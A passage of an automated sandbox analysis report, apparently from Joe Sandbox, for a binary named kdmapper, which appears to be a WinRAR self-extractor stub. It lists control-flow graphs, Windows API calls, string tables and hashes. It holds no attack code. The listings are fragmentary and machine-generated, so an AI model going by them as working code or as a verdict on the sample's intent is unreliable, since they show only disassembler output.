                                                                                                                                                                            • Part of subcall function 0063D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0063AF07,00000001,?,?,0063B7B9,0065506C,0067FCB8,0067FCB8,00001000,00000000,00000000), ref: 0063D510
                                                                                                                                                                            • Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0063D51B
                                                                                                                                                                            • Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000C2,00000000,006535F4), ref: 0063D529
                                                                                                                                                                            • Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0063D53F
                                                                                                                                                                            • Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0063D559
                                                                                                                                                                            • Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0063D59D
                                                                                                                                                                            • Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0063D5AB
                                                                                                                                                                            • Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0063D5BA
                                                                                                                                                                            • Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0063D5E1
                                                                                                                                                                            • Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000C2,00000000,006543F4), ref: 0063D5F0
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0063BA68
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0063BA90
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0063BAAE
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063BAC2
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000011), ref: 0063BAF4
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0063BB43
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063BB7C
                                                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0063BBD0
                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 0063BBEA
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0063BC47
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 0063BC6F
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0063BCB9
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0063BCE2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0063BCEB
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063BD1E
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063BD7D
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000065,006535F4), ref: 0063BD94
                                                                                                                                                                          • GetDlgItem.USER32(?,00000065), ref: 0063BD9D
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0063BDAC
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0063BDBB
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063BE68
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0063BEBE
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0063BEE8
                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 0063BF32
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0063BF4C
                                                                                                                                                                          • GetDlgItem.USER32(?,00000068), ref: 0063BF55
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0063BF6B
                                                                                                                                                                          • GetDlgItem.USER32(?,00000066), ref: 0063BF85
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,0066A472), ref: 0063BFA7
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0063C007
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063C01A
                                                                                                                                                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0063C0BD
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 0063C197
                                                                                                                                                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0063C1D9
                                                                                                                                                                            • Part of subcall function 0063C73F: __EH_prolog.LIBCMT ref: 0063C744
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063C1FD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                                                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^c$__tmp_rar_sfx_access_check_%u$hc$winrarsfxmappingfile.tmp$Qe
                                                                                                                                                                          • API String ID: 3829768659-118249567
                                                                                                                                                                          • Opcode ID: 92803631abd0769ee5ee28cf84898c120b07d2083d3f122c64d92295ec127a01
                                                                                                                                                                          • Instruction ID: eb5c02d50e307f7b7d1669118fcb6e46724e51da807570a25a465a245a150a17
                                                                                                                                                                          • Opcode Fuzzy Hash: 92803631abd0769ee5ee28cf84898c120b07d2083d3f122c64d92295ec127a01
                                                                                                                                                                          • Instruction Fuzzy Hash: 1442F670944354BEEB219BB09C4AFBE37BFAB01B00F002159F645B62D2CFB55A44CBA5

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 268 630863-630886 call 63ec50 GetModuleHandleW 271 6308e7-630b48 268->271 272 630888-63089f GetProcAddress 268->272 275 630c14-630c40 GetModuleFileNameW call 62c29a call 630602 271->275 276 630b4e-630b59 call 6475fb 271->276 273 6308a1-6308b7 272->273 274 6308b9-6308c9 GetProcAddress 272->274 273->274 278 6308e5 274->278 279 6308cb-6308e0 274->279 290 630c42-630c4e call 62b146 275->290 276->275 285 630b5f-630b8d GetModuleFileNameW CreateFileW 276->285 278->271 279->278 288 630c08-630c0f CloseHandle 285->288 289 630b8f-630b9b SetFilePointer 285->289 288->275 289->288 291 630b9d-630bb9 ReadFile 289->291 297 630c50-630c5b call 63081b 290->297 298 630c7d-630ca4 call 62c310 GetFileAttributesW 290->298 291->288 294 630bbb-630be0 291->294 296 630bfd-630c06 call 630371 294->296 296->288 305 630be2-630bfc call 63081b 296->305 297->298 307 630c5d-630c7b CompareStringW 297->307 308 630ca6-630caa 298->308 309 630cae 298->309 305->296 307->298 307->308 308->290 311 630cac 308->311 312 630cb0-630cb5 309->312 311->312 313 630cb7 312->313 314 630cec-630cee 312->314 315 630cb9-630ce0 call 62c310 GetFileAttributesW 313->315 316 630cf4-630d0b call 62c2e4 call 62b146 314->316 317 630dfb-630e05 314->317 322 630ce2-630ce6 315->322 323 630cea 315->323 327 630d73-630da6 call 624092 AllocConsole 316->327 328 630d0d-630d6e call 63081b * 2 call 62e617 call 624092 call 62e617 call 63a7e4 316->328 322->315 325 630ce8 322->325 323->314 325->314 334 630df3-630df5 ExitProcess 327->334 335 630da8-630ded GetCurrentProcessId AttachConsole call 643e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->335 328->334 335->334
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 0063087C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0063088E
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 006308BF
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00630B69
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00630B83
                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00630B93
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,|<e,00000000), ref: 00630BB1
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00630C09
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00630C1E
                                                                                                                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<e,?,00000000,?,00000800), ref: 00630C72
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,|<e,00000800,?,00000000,?,00000800), ref: 00630C9C
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,D=e,00000800), ref: 00630CD8
                                                                                                                                                                            • Part of subcall function 0063081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00630836
                                                                                                                                                                            • Part of subcall function 0063081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0062F2D8,Crypt32.dll,00000000,0062F35C,?,?,0062F33E,?,?,?), ref: 00630858
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00630D4A
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00630D96
                                                                                                                                                                            • Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5
                                                                                                                                                                          • AllocConsole.KERNEL32 ref: 00630D9E
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00630DA8
                                                                                                                                                                          • AttachConsole.KERNEL32(00000000), ref: 00630DAF
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00630DC4
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00630DD5
                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000), ref: 00630DDC
                                                                                                                                                                          • Sleep.KERNEL32(00002710), ref: 00630DE7
                                                                                                                                                                          • FreeConsole.KERNEL32 ref: 00630DED
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00630DF5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                                                          • String ID: (=e$,<e$,@e$0?e$0Ae$4Be$8>e$D=e$DXGIDebug.dll$H?e$H@e$HAe$P>e$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=e$`@e$d?e$dAe$dwmapi.dll$h=e$h>e$kernel32$uxtheme.dll$|<e$|?e$|@e$<e$>e$?e$@e$Ae
                                                                                                                                                                          • API String ID: 1207345701-3325451791
                                                                                                                                                                          • Opcode ID: 2d07f1df29da917e5e964dcd3a47aba558dcfa066bcf44e1c030210b3cf229e0
                                                                                                                                                                          • Instruction ID: 27c5cc3e62403e93d5c90c03885bb0c6ef022ceb85bcd6e0525c7e08f62b43bf
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d07f1df29da917e5e964dcd3a47aba558dcfa066bcf44e1c030210b3cf229e0
                                                                                                                                                                          • Instruction Fuzzy Hash: 3ED193B1008364ABD331DF50D859ADFBEFAAF84B4AF50591DF98596380CB70864CCB92

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 347 63c73f-63c757 call 63eb78 call 63ec50 352 63d40d-63d418 347->352 353 63c75d-63c787 call 63b314 347->353 353->352 356 63c78d-63c792 353->356 357 63c793-63c7a1 356->357 358 63c7a2-63c7b7 call 63af98 357->358 361 63c7b9 358->361 362 63c7bb-63c7d0 call 631fbb 361->362 365 63c7d2-63c7d6 362->365 366 63c7dd-63c7e0 362->366 365->362 367 63c7d8 365->367 368 63c7e6 366->368 369 63d3d9-63d404 call 63b314 366->369 367->369 370 63ca5f-63ca61 368->370 371 63c9be-63c9c0 368->371 372 63c7ed-63c7f0 368->372 373 63ca7c-63ca7e 368->373 369->357 384 63d40a-63d40c 369->384 370->369 375 63ca67-63ca77 SetWindowTextW 370->375 371->369 377 63c9c6-63c9d2 371->377 372->369 378 63c7f6-63c850 call 63a64d call 62bdf3 call 62a544 call 62a67e call 626edb 372->378 373->369 376 63ca84-63ca8b 373->376 375->369 376->369 380 63ca91-63caaa 376->380 381 63c9e6-63c9eb 377->381 382 63c9d4-63c9e5 call 647686 377->382 435 63c98f-63c9a4 call 62a5d1 378->435 385 63cab2-63cac0 call 643e13 380->385 386 63caac 380->386 389 63c9f5-63ca00 call 63b48e 381->389 390 63c9ed-63c9f3 381->390 382->381 384->352 385->369 403 63cac6-63cacf 385->403 386->385 395 63ca05-63ca07 389->395 390->395 397 63ca12-63ca32 call 643e13 call 643e3e 395->397 398 63ca09-63ca10 call 643e13 395->398 424 63ca34-63ca3b 397->424 425 63ca4b-63ca4d 397->425 398->397 408 63cad1-63cad5 403->408 409 63caf8-63cafb 403->409 411 63cb01-63cb04 408->411 414 63cad7-63cadf 408->414 409->411 412 63cbe0-63cbee call 630602 409->412 417 63cb11-63cb2c 411->417 418 63cb06-63cb0b 411->418 426 63cbf0-63cc04 call 64279b 412->426 414->369 415 63cae5-63caf3 call 630602 414->415 415->426 436 63cb76-63cb7d 417->436 437 63cb2e-63cb68 417->437 418->412 418->417 431 63ca42-63ca4a call 647686 424->431 432 63ca3d-63ca3f 424->432 425->369 427 63ca53-63ca5a call 643e2e 425->427 446 63cc11-63cc62 call 630602 call 63b1be GetDlgItem SetWindowTextW SendMessageW call 643e49 426->446 447 63cc06-63cc0a 426->447 427->369 431->425 432->431 453 63c855-63c869 SetFileAttributesW 435->453 454 63c9aa-63c9b9 call 62a55a 435->454 439 63cbab-63cbce call 643e13 * 2 436->439 440 63cb7f-63cb97 call 643e13 436->440 470 63cb6a 437->470 471 63cb6c-63cb6e 437->471 439->426 475 63cbd0-63cbde call 6305da 439->475 440->439 457 63cb99-63cba6 call 6305da 440->457 481 63cc67-63cc6b 446->481 447->446 452 63cc0c-63cc0e 447->452 452->446 458 63c90f-63c91f GetFileAttributesW 453->458 459 63c86f-63c8a2 call 62b991 call 62b690 call 643e13 453->459 454->369 457->439 458->435 468 63c921-63c930 DeleteFileW 458->468 491 63c8b5-63c8c3 call 62bdb4 459->491 492 63c8a4-63c8b3 call 643e13 459->492 468->435 474 63c932-63c935 468->474 470->471 471->436 478 63c939-63c965 call 624092 GetFileAttributesW 474->478 475->426 487 63c937-63c938 478->487 488 63c967-63c97d MoveFileW 478->488 481->369 485 63cc71-63cc85 SendMessageW 481->485 485->369 487->478 488->435 490 63c97f-63c989 MoveFileExW 488->490 490->435 491->454 497 63c8c9-63c908 call 643e13 call 63fff0 491->497 492->491 492->497 497->458
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 0063C744
                                                                                                                                                                            • Part of subcall function 0063B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0063B3FB
                                                                                                                                                                            • Part of subcall function 0063AF98: _wcschr.LIBVCRUNTIME ref: 0063B033
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0063CA0A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0063CA13
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0063CA71
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0063CAB3
                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 0063CBFB
                                                                                                                                                                          • GetDlgItem.USER32(?,00000066), ref: 0063CC36
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0063CC46
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,0066A472), ref: 0063CC54
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0063CC7F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                                                                          • String ID: %s.%d.tmp$<br>$<c$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$c
                                                                                                                                                                          • API String ID: 986293930-2607664511
                                                                                                                                                                          • Opcode ID: c25f3e5c28fcf77cbfd193b946d328bf717355187fe3496ffd3dd1f74a0a2e72
                                                                                                                                                                          • Instruction ID: 437e1ee01c6e7d1fd9c407295ba5c7f15c8f7a68f52c27a10ac876d244b8ac02
                                                                                                                                                                          • Opcode Fuzzy Hash: c25f3e5c28fcf77cbfd193b946d328bf717355187fe3496ffd3dd1f74a0a2e72
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DE168B2900228AADF25DBA4DD45EEE77BE9F05350F0041AAF549E7140EF749F848FA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 0062DA70
                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 0062DA91
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0062DAAC
                                                                                                                                                                            • Part of subcall function 0062C29A: _wcslen.LIBCMT ref: 0062C2A2
                                                                                                                                                                            • Part of subcall function 006305DA: _wcslen.LIBCMT ref: 006305E0
                                                                                                                                                                            • Part of subcall function 00631B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0062BAE9,00000000,?,?,?,000303EC), ref: 00631BA0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0062DDE9
                                                                                                                                                                          • __fprintf_l.LIBCMT ref: 0062DF1C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9e
                                                                                                                                                                          • API String ID: 557298264-2168584641
                                                                                                                                                                          • Opcode ID: b9c86af2798459fd3a06bab737f6475d497504142bea608449a41b5542b91d31
                                                                                                                                                                          • Instruction ID: 4b15106f825ad50622e97eb6e0882b05bc5aa0c3c09ace2300efc39ffdd23b74
                                                                                                                                                                          • Opcode Fuzzy Hash: b9c86af2798459fd3a06bab737f6475d497504142bea608449a41b5542b91d31
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E32F171900628DBDF24EF64E845AEE77A6FF05700F40056AF9069B281E7B2DD85CF94

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0063B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063B579
                                                                                                                                                                            • Part of subcall function 0063B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B58A
                                                                                                                                                                            • Part of subcall function 0063B568: IsDialogMessageW.USER32(000303EC,?), ref: 0063B59E
                                                                                                                                                                            • Part of subcall function 0063B568: TranslateMessage.USER32(?), ref: 0063B5AC
                                                                                                                                                                            • Part of subcall function 0063B568: DispatchMessageW.USER32(?), ref: 0063B5B6
                                                                                                                                                                          • GetDlgItem.USER32(00000068,0067FCB8), ref: 0063D4E8
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,0063AF07,00000001,?,?,0063B7B9,0065506C,0067FCB8,0067FCB8,00001000,00000000,00000000), ref: 0063D510
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0063D51B
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,006535F4), ref: 0063D529
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0063D53F
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0063D559
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0063D59D
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0063D5AB
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0063D5BA
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0063D5E1
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,006543F4), ref: 0063D5F0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                          • String ID: \
                                                                                                                                                                          • API String ID: 3569833718-2967466578
                                                                                                                                                                          • Opcode ID: 8dffcd206025575c6383409630f0e00a34ab0ff73ba75fa35c1e1f6de76a9648
                                                                                                                                                                          • Instruction ID: a4d036ef46bac5f2f52ff4eb26ad8c29cbfb61f60115c0fe1de0524aa52a3eb0
                                                                                                                                                                          • Opcode Fuzzy Hash: 8dffcd206025575c6383409630f0e00a34ab0ff73ba75fa35c1e1f6de76a9648
                                                                                                                                                                          • Instruction Fuzzy Hash: 0331E771145351BFD301DF20DC4AFAB7FAEEB82B14F000608F651962D0DBA48A0487BB

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 837 63d78f-63d7a7 call 63ec50 840 63d9e8-63d9f0 837->840 841 63d7ad-63d7b9 call 643e13 837->841 841->840 844 63d7bf-63d7e7 call 63fff0 841->844 847 63d7f1-63d7ff 844->847 848 63d7e9 844->848 849 63d812-63d818 847->849 850 63d801-63d804 847->850 848->847 852 63d85b-63d85e 849->852 851 63d808-63d80e 850->851 854 63d810 851->854 855 63d837-63d844 851->855 852->851 853 63d860-63d866 852->853 858 63d868-63d86b 853->858 859 63d86d-63d86f 853->859 860 63d822-63d82c 854->860 856 63d9c0-63d9c2 855->856 857 63d84a-63d84e 855->857 861 63d9c6 856->861 857->861 862 63d854-63d859 857->862 858->859 863 63d882-63d898 call 62b92d 858->863 859->863 864 63d871-63d878 859->864 865 63d81a-63d820 860->865 866 63d82e 860->866 870 63d9cf 861->870 862->852 873 63d8b1-63d8bc call 62a231 863->873 874 63d89a-63d8a7 call 631fbb 863->874 864->863 867 63d87a 864->867 865->860 869 63d830-63d833 865->869 866->855 867->863 869->855 872 63d9d6-63d9d8 870->872 876 63d9e7 872->876 877 63d9da-63d9dc 872->877 882 63d8d9-63d8e6 ShellExecuteExW 873->882 883 63d8be-63d8d5 call 62b6c4 873->883 874->873 884 63d8a9 874->884 876->840 877->876 880 63d9de-63d9e1 ShowWindow 877->880 880->876 882->876 886 63d8ec-63d8f9 882->886 883->882 884->873 888 63d8fb-63d902 886->888 889 63d90c-63d90e 886->889 888->889 890 63d904-63d90a 888->890 891 63d910-63d919 889->891 892 63d925-63d944 call 63dc3b 889->892 890->889 893 63d97b-63d987 CloseHandle 890->893 891->892 901 63d91b-63d923 ShowWindow 891->901 892->893 905 63d946-63d94e 892->905 895 63d989-63d996 call 631fbb 893->895 896 63d998-63d9a6 893->896 895->870 895->896 896->872 900 63d9a8-63d9aa 896->900 900->872 904 63d9ac-63d9b2 900->904 901->892 904->872 906 63d9b4-63d9be 904->906 905->893 907 63d950-63d961 GetExitCodeProcess 905->907 906->872 907->893 908 63d963-63d96d 907->908 909 63d974 908->909 910 63d96f 908->910 909->893 910->909
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0063D7AE
                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 0063D8DE
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0063D91D
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 0063D959
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0063D97F
                                                                                                                                                                          • ShowWindow.USER32(?,00000001), ref: 0063D9E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
